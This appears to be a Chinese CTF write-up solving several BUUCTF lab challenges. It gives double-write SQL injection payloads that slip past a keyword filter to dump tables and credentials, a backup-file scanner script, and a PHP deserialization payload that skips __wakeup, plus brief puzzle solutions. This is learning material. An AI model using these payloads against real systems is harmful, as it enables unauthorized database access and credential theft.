目录

 [极客大挑战 2019]BabySQL

[极客大挑战 2019]PHP

神秘龙卷风

 假如给我三天光明

后门查杀

webshell后门

---

 [极客大挑战 2019]BabySQL

1.

 发现存在sql注入

2.使用bp用fuzz字典爆破一下哪些词被过滤了，发现or，select等都被过滤了

尝试双写注入

 

3.查看列数：1' ununionion selselectect 1,2,3#

 

 4.爆数据库

1' ununionion selselectect 1,2,database()#

5.爆表名

1' ununionion selselectect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema='geek'#

 6.爆字段

1' ununionion selselectect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name='b4bsql'#

7，查看字段，爆数据

1' ununionion selselectect 1,2,group_concat(concat_ws('~',username,passwoorrd)) frfromom geek.b4bsql#

8.查看页面源代码

[极客大挑战 2019]PHP 

1.使用御剑没有扫出来，用找的py脚本。。。

import requests

url1 = 'http://f2cd8c7d-4068-4ccb-8c5a-184bb1d299d2.node4.buuoj.cn:81/'  # url为被扫描地址

# 常见的网站源码备份文件名  同目录下创建List.txt 如web,website,backup,back,www,wwwroot,temp等
# with open('List1.txt', 'r') as f:
#     list1 = f.read().splitlines()
list1 = ['web', 'website', 'backup', 'back', 'www', 'wwwroot', 'temp']

# 常见的网站源码备份文件后缀
list2 = ['tar', 'tar.gz', 'zip', 'rar', '7-zip', '7z']
for i in list1:
    for j in list2:
        back = str(i) + '.' + str(j)
        url = str(url1) + '/' + back
        print(back + '    ', end='')
        print(requests.get(url).status_code)

扫描得到www.zip

 url后跟上/www.zip，下载得到文件

 查看index.php

//index.php
<!DOCTYPE html>
<head>
  <meta charset="UTF-8">
  <title>I have a cat!</title>
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css">
      <link rel="stylesheet" href="style.css">
</head>
<style>
    #login{   
        position: absolute;   
        top: 50%;   
        left:50%;   
        margin: -150px 0 0 -150px;   
        width: 300px;   
        height: 300px;   
    }   
    h4{   
        font-size: 2em;   
        margin: 0.67em 0;   
    }
</style>
<body>
<div id="world">
    <div style="text-shadow:0px 0px 5px;font-family:arial;color:black;font-size:20px;position: absolute;bottom: 85%;left: 440px;font-family:KaiTi;">因为每次猫猫都在我键盘上乱跳，所以我有一个良好的备份网站的习惯
    </div>
    <div style="text-shadow:0px 0px 5px;font-family:arial;color:black;font-size:20px;position: absolute;bottom: 80%;left: 700px;font-family:KaiTi;">不愧是我！！！
    </div>
    <div style="text-shadow:0px 0px 5px;font-family:arial;color:black;font-size:20px;position: absolute;bottom: 70%;left: 640px;font-family:KaiTi;">
    <?php
    include 'class.php';
    $select = $_GET['select'];
    $res=unserialize(@$select);
    ?> //页面可以传进一个参数select然后把它反序列化，反序列化的过程中会用到class.php
    </div>
    <div style="position: absolute;bottom: 5%;width: 99%;"><p align="center" style="font:italic 15px Georgia,serif;color:white;"> Syclover @ cl4y</p></div>
</div>
<script src='http://cdnjs.cloudflare.com/ajax/libs/three.js/r70/three.min.js'></script>
<script src='http://cdnjs.cloudflare.com/ajax/libs/gsap/1.16.1/TweenMax.min.js'></script>
<script src='https://s3-us-west-2.amazonaws.com/s.cdpn.io/264161/OrbitControls.js'></script>
<script src='https://s3-us-west-2.amazonaws.com/s.cdpn.io/264161/Cat.js'></script>
<script  src="index.js"></script>
</body>
</html>

class.php

//class.php
<?php
include 'flag.php';


error_reporting(0);


class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();

            
        }
    }
}
?>

如果想要输出flag，username绝对等于admin，password要弱等于100，不然的话就会在上面的判断里被die。

再往上看到，wakeup函数里会把我们的username赋值为guest。因为wakeup函数是在__destruct函数之前运行的。wakeup（）函数： 与__sleep()函数相反，__sleep()函数，是在序列化时被自动调用。__wakeup()函数，在反序列化时，被自动调用。这个__wakeup()函数有个漏洞就是当反序列化字符串，表示属性个数的值大于真实属性个数时，会跳过 __wakeup 函数的执行。所以我们要绕过它。要绕过__wakeup只要让说明的参数个数大于实际的参数个数就行了

经过分析，已经确定需要提交的参数是 select，而且提交的值是经过序列化之后的值，username=‘admin’,password=‘100’ 才能过。

 而且我们要调用到__destruct（）并且password=100,username=admin才能echo $flag
怎么调用到它呢？其实在反序列化脚本结束时会自动调用它，它是unserialize()结束的魔术方法（魔法函数）             参考php魔法函数_TuudOp的博客-CSDN博客php魔法函数_TuudOp的博客-CSDN博客

<?php
class Name{
	private $username='admin';
	private $password='100';
}
$n=new Name();
echo(serialize($n)); //序列化
?>

 

PHP——serialize()序列化类变量public、protected、private的区别_序列化private_Ho1aAs的博客-CSDN博客还要PHP的private(私有类)的反序列化：变量名前添加标记PHP——serialize()序列化类变量public、protected、private的区别_序列化private_Ho1aAs的博客-CSDN博客

构造payload：

O:4:"Name":3:{s:14:"\00Name\00username";s:5:"admin";s:14:"\00Name\00password";i:100;}

但是这个payload是在URL上提交的话。会因为编码问题，在传递\00的时候会丢失。截断符可以用%00代替，所以这里需要把\00改成%00。所以最后得到的payload为：

?select=O:4:"Name":3{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

 

神秘龙卷风

1.下载文件，一个有密码的压缩文件

 2.根据题目四位数，使用archpr，爆破得到密码

3.打开txt文件

4。查找资料得知这是brainfuck代码，在线解密得到flag

 假如给我三天光明

1.下载的图片最后一行有一排盲文。。

使用盲文对照表

得出密码为kmdonowg。

解密得到一个音频文件，使用audacity分析

长的一段是-,短的一段是.然后结合摩斯密码表就得到了答案

flag{wpei08732?23dz}

后门查杀

扫描，定位后门位置

 包裹得到flag

webshell后门

 用windows安全系统扫描一下，打开member文件夹下的zp.zip